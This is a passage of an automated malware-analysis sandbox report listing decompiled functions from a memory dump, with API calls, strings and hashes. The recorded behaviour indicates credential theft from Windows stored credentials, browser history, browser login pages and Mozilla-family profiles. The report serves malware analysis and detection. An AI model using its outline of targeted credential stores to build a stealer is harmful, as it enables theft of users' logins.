                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                  • CloseHandle.KERNEL32(?), ref: 0040E148
                                                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                  • String ID: bhv
                                                  • API String ID: 327780389-2689659898
                                                  • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                  • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                  • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                  • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                  Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                  • API String ID: 2941347001-70141382
                                                  • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                  • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                  • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                  • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                  Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 638 4466f4-44670e call 446904 GetModuleHandleA 641 446710-44671b 638->641 642 44672f-446732 638->642 641->642 643 44671d-446726 641->643 644 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 642->644 646 446747-44674b 643->646 647 446728-44672d 643->647 652 4467ac-4467b7 __setusermatherr 644->652 653 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 644->653 646->642 648 44674d-44674f 646->648 647->642 650 446734-44673b 647->650 651 446755-446758 648->651 650->642 654 44673d-446745 650->654 651->644 652->653 657 446810-446819 653->657 658 44681e-446825 653->658 654->651 659 4468d8-4468dd call 44693d 657->659 660 446827-446832 658->660 661 44686c-446870 658->661 664 446834-446838 660->664 665 44683a-44683e 660->665 662 446845-44684b 661->662 663 446872-446877 661->663 667 446853-446864 GetStartupInfoW 662->667 668 44684d-446851 662->668 663->661 664->660 664->665 665->662 669 446840-446842 665->669 671 446866-44686a 667->671 672 446879-44687b 667->672 668->667 668->669 669->662 673 44687c-446894 GetModuleHandleA call 41276d 671->673 672->673 676 446896-446897 exit 673->676 677 44689d-4468d6 _cexit 673->677 676->677 677->659
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                  • String ID:
                                                  • API String ID: 2827331108-0
                                                  • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                  • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                  • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                  • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                  Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • memset.MSVCRT ref: 0040C298
                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                  • wcschr.MSVCRT ref: 0040C324
                                                  • wcschr.MSVCRT ref: 0040C344
                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                  • GetLastError.KERNEL32 ref: 0040C373
                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                  • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                  • String ID: visited:
                                                  • API String ID: 1157525455-1702587658
                                                  • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                  • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                  • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                  • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                  Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 ??3@YAXPAX@Z 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                                  APIs
                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                  • memset.MSVCRT ref: 0040E1BD
                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                  • _snwprintf.MSVCRT ref: 0040E257
                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                  • API String ID: 3883404497-2982631422
                                                  • Opcode ID: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                  • Opcode Fuzzy Hash: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                  Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                    • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                  • memset.MSVCRT ref: 0040BC75
                                                  • memset.MSVCRT ref: 0040BC8C
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                  • memcmp.MSVCRT ref: 0040BCD6
                                                  • memcpy.MSVCRT ref: 0040BD2B
                                                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                  • String ID:
                                                  • API String ID: 509814883-3916222277
                                                  • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                  • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                  • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                  • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                  Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 789 41837f-4183bf 790 4183c1-4183cc call 418197 789->790 791 4183dc-4183ec call 418160 789->791 796 4183d2-4183d8 790->796 797 418517-41851d 790->797 798 4183f6-41840b 791->798 799 4183ee-4183f1 791->799 796->791 800 418417-418423 798->800 801 41840d-418415 798->801 799->797 802 418427-418442 call 41739b 800->802 801->802 805 418444-41845d CreateFileW 802->805 806 41845f-418475 CreateFileA 802->806 807 418477-41847c 805->807 806->807 808 4184c2-4184c7 807->808 809 41847e-418495 GetLastError ??3@YAXPAX@Z 807->809 812 4184d5-418501 memset call 418758 808->812 813 4184c9-4184d3 808->813 810 4184b5-4184c0 call 444706 809->810 811 418497-4184b3 call 41837f 809->811 810->797 811->797 819 418506-418515 ??3@YAXPAX@Z 812->819 813->812 819->797
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                  • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                  • GetLastError.KERNEL32 ref: 0041847E
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CreateFile$??3@ErrorLast
                                                  • String ID: |A
                                                  • API String ID: 1407640353-1717621600
                                                  • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                  • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                  • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                  • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                  Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                  • String ID: r!A
                                                  • API String ID: 2791114272-628097481
                                                  • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                  • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                  Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                    • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                  • _wcslwr.MSVCRT ref: 0040C817
                                                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                  • wcslen.MSVCRT ref: 0040C82C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                  • API String ID: 62308376-4196376884
                                                  • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                  • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                  Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                  • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                  • wcslen.MSVCRT ref: 0040BE06
                                                  • _wcsncoll.MSVCRT ref: 0040BE38
                                                  • memset.MSVCRT ref: 0040BE91
                                                  • memcpy.MSVCRT ref: 0040BEB2
                                                  • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                  • wcschr.MSVCRT ref: 0040BF24
                                                  • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                  • String ID:
                                                  • API String ID: 3191383707-0
                                                  • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                  • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                  • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                  • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                  Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 00403CBF
                                                  • memset.MSVCRT ref: 00403CD4
                                                  • memset.MSVCRT ref: 00403CE9
                                                  • memset.MSVCRT ref: 00403CFE
                                                  • memset.MSVCRT ref: 00403D13
                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                  • memset.MSVCRT ref: 00403DDA
                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                  • String ID: Waterfox$Waterfox\Profiles
                                                  • API String ID: 3527940856-11920434
                                                  • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                  • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                  Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 00403E50
                                                  • memset.MSVCRT ref: 00403E65
                                                  • memset.MSVCRT ref: 00403E7A
                                                  • memset.MSVCRT ref: 00403E8F
                                                  • memset.MSVCRT ref: 00403EA4
                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                  • memset.MSVCRT ref: 00403F6B
                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                  • API String ID: 3527940856-2068335096
                                                  • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                  • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                  • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                  • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                  Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 00403FE1
                                                  • memset.MSVCRT ref: 00403FF6
                                                  • memset.MSVCRT ref: 0040400B
                                                  • memset.MSVCRT ref: 00404020
                                                  • memset.MSVCRT ref: 00404035
                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                  • memset.MSVCRT ref: 004040FC
                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                  • API String ID: 3527940856-3369679110
                                                  • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                  • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                  • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                  • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                  Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
